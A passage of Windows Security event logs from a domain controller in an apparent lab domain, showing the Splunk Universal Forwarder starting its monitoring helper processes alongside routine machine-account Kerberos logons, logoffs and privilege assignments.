Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:09:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263531
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1258
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:09:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263532
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1754
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:09:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263534
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:09:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263533
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a58
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:09:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263535
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718E19
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:09:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263538
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x71C817
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:09:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263537
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x71C817
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59808
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:09:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263536
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x71C817
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:10:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263539
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263541
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xffc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263540
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263542
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263543
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263544
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1794
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263545
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf68
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:10:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263548
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7202DB
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:10:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263547
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7202DB
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59821
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:10:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263546
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7202DB
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:11:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263550
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1924
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263549
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263551
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x197c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263552
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x165c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263553
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
